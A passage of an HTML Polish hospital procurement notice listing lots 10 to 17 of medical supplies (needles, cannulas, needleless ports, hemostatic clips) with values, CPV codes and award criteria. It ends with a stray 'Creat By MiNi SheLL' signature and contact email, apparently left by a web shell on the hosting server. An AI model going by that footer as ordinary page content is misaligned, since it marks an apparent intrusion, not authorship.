<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 24 360,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł  do znieczuleń podpajęczynówkowych typu Pencil-Point oraz standardowych, igieł do nakłuć lędźwiowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.22-3, 33.14.13.28-5, 33.14.13.23-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Igły lokalizacyjne z haczykiem do zmian w piersiach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 3 780,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł lokalizacyjnych z haczykiem do zmian w piersiach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Igły do blokady nerwów obwodowych do posiadanego przez zamawiającego Stymulatora HNS 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 7 080,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł do blokady nerwów obwodowych do posiadanego przez zamawiającego Stymulatora HNS 12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.21-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Jednokrotnego użytku igły do ostrzykiwania do kolonoskopii, kleszczyki biopsyjne oraz pętle  do polipektomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 36 060,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy jednokrotnego uzytku igieł do ostrzykiwania do kolonoskopii, kleszczyków biopsyjnych oraz pętli  do polipektomii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.16.80.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Kaniule dotętnicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 13 860,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy kaniuli dotętniczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Igły do biopsji gruboigłowej kompatybilne z posiadanymi przez zamawiającego pistoletami Biopty oraz Magnum (MG1522) firmy Bard.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 8 880,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł do biopsji gruboigłowej kompatybilnych z posiadanymi przez zamawiającego pistoletami Biopty oraz Magnum (MG1522) firmy Bard.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Bezigłowe nasadki do pobierania leków z fiolek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 5 400,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy bezigłowych nasadek do pobierania leków z fiolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Bezigłowe porty do iniekcji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 7 200,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy bezigłowych portów do iniekcji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Klipsy hemostatycznye jednokrotnego  użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 21 600,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy klipsów hemostatycznych jednokrotnego  użytku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com